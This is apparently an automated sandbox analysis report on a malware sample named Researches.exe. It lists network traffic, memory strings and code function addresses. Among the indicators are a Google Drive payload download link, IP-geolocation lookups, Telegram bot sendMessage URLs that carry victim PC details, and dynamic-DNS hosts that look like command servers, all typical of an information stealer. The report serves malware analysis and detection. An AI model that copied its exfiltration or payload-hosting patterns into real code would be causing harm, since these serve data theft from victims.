          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 19:36:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: Researches.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Researches.exe, 0000000B.00000002.3541070923.00000000337E1000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000337D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Researches.exe, 0000000B.00000002.3541070923.00000000337E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enT
          Source: Researches.exe, 0000000B.00000002.3541070923.00000000337DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-40f1-ac21-573d1d5ce43f
          Source: Researches.exe, 0000000B.00000002.3519951277.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.0000000003182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs
          Source: Researches.exe, 0000000B.00000002.3519987420.0000000003182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs-
          Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
          Source: Researches.exe, 0000000B.00000003.3010057764.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3035966204.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.00000000031AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3010057764.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3035966204.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.000000000319F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Researches.exe, 0000000B.00000002.3541070923.000000003370B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.000000003369B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Researches.exe, 0000000B.00000002.3541070923.000000003369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: Researches.exe, 0000000B.00000002.3541070923.000000003370B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000336C5000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033812000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: Researches.exe, 0000000B.00000002.3541070923.0000000033812000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/T
          Source: Researches.exe, 0000000B.00000002.3541070923.000000003380D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 57279 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57276
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57278
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57279
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57272
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57274
          Source: unknownNetwork traffic detected: HTTP traffic on port 57266 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57270
          Source: unknownNetwork traffic detected: HTTP traffic on port 57268 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57260 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57274 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57278 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57272 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57270 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57266
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57268
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57261
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57263
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57264
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57260
          Source: unknownNetwork traffic detected: HTTP traffic on port 57263 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57261 -> 443
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:57260 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:57261 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:57279 version: TLS 1.2
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,11_2_0040331C
          Source: C:\Users\user\Desktop\Researches.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00404AD20_2_00404AD2
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_004064F70_2_004064F7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_00404AD211_2_00404AD2
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_004064F711_2_004064F7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2D28811_2_02D2D288
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2538011_2_02D25380
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2A08811_2_02D2A088
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2C14811_2_02D2C148
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D276F111_2_02D276F1
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2F62F11_2_02D2F62F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2C74811_2_02D2C748
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2649811_2_02D26498
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2C47811_2_02D2C478
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CA1811_2_02D2CA18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2E98811_2_02D2E988
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D269B011_2_02D269B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CFB811_2_02D2CFB8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CCE811_2_02D2CCE8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2D27811_2_02D2D278
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2537F11_2_02D2537F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2C73811_2_02D2C738
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2C46811_2_02D2C468
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D23AA111_2_02D23AA1
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CA0811_2_02D2CA08
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D229EC11_2_02D229EC
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D239ED11_2_02D239ED
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2E98711_2_02D2E987
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CFB711_2_02D2CFB7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CCE711_2_02D2CCE7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36633A5011_2_36633A50
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36634A8811_2_36634A88
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_366323D011_2_366323D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36638FA811_2_36638FA8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663185011_2_36631850
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663F8F811_2_3663F8F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36634A7811_2_36634A78
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663DE2011_2_3663DE20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663860011_2_36638600
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663DE1011_2_3663DE10
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663E6E911_2_3663E6E9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663E6F811_2_3663E6F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_366396CD11_2_366396CD
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_366396D011_2_366396D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663E2A011_2_3663E2A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663E29011_2_3663E290
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663EB4111_2_3663EB41
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663CB4811_2_3663CB48
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663EB5011_2_3663EB50
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663CB5811_2_3663CB58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36630B2011_2_36630B20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36630B3011_2_36630B30
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663C70011_2_3663C700
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663EFE811_2_3663EFE8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663CFF911_2_3663CFF9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663EFF811_2_3663EFF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_366323C011_2_366323C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663184111_2_36631841
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663004011_2_36630040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663F44F11_2_3663F44F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663F45011_2_3663F450
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663002311_2_36630023
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663D00011_2_3663D000
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663F8E911_2_3663F8E9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663D54811_2_3663D548
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663D53811_2_3663D538
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663D9A011_2_3663D9A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3663D99111_2_3663D991
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36821E4011_2_36821E40
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368217E811_2_368217E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36822C2011_2_36822C20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682A1B011_2_3682A1B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682CA8811_2_3682CA88
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682129011_2_36821290
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368212A011_2_368212A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682AABF11_2_3682AABF
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36828ACF11_2_36828ACF
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682AAD011_2_3682AAD0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36826ADF11_2_36826ADF
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36828AE011_2_36828AE0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36826AF011_2_36826AF0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682A63111_2_3682A631
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682863F11_2_3682863F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682A64011_2_3682A640
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682665011_2_36826650
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682865011_2_36828650
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682666011_2_36826660
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682CA7911_2_3682CA79
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36824F8011_2_36824F80
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36826F8011_2_36826F80
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36824F9011_2_36824F90
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682D39811_2_3682D398
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682EBA111_2_3682EBA1
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682D3A811_2_3682D3A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682EBB011_2_3682EBB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682B3E011_2_3682B3E0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368217E711_2_368217E7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682B3F011_2_3682B3F0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368293F011_2_368293F0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682CF0711_2_3682CF07
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682E71011_2_3682E710
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682CF1811_2_3682CF18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682E72011_2_3682E720
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682AF5111_2_3682AF51
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682AF6011_2_3682AF60
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36828F6111_2_36828F61
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36826F7011_2_36826F70
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36828F7011_2_36828F70
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682988011_2_36829880
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682989011_2_36829890
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682789011_2_36827890
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368258A011_2_368258A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368278A011_2_368278A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368258B011_2_368258B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682DCB711_2_3682DCB7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F4C011_2_3682F4C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682BCC711_2_3682BCC7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682DCC811_2_3682DCC8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F4D011_2_3682F4D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682BCD811_2_3682BCD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682940011_2_36829400
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36822C0F11_2_36822C0F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682540F11_2_3682540F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682740C11_2_3682740C
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682001311_2_36820013
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682741011_2_36827410
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682542011_2_36825420
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682D82711_2_3682D827
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F02F11_2_3682F02F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682D83811_2_3682D838
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682B83911_2_3682B839
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F04011_2_3682F040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682004011_2_36820040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682B84811_2_3682B848
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682A1A111_2_3682A1A1
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368241A811_2_368241A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368281AF11_2_368281AF
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368261C011_2_368261C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36820DC011_2_36820DC0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368281C011_2_368281C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368261D011_2_368261D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36820DD011_2_36820DD0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682C5E811_2_3682C5E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682C5F811_2_3682C5F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36829D0F11_2_36829D0F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36827D2311_2_36827D23
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36829D2011_2_36829D20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36825D3311_2_36825D33
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36827D3011_2_36827D30
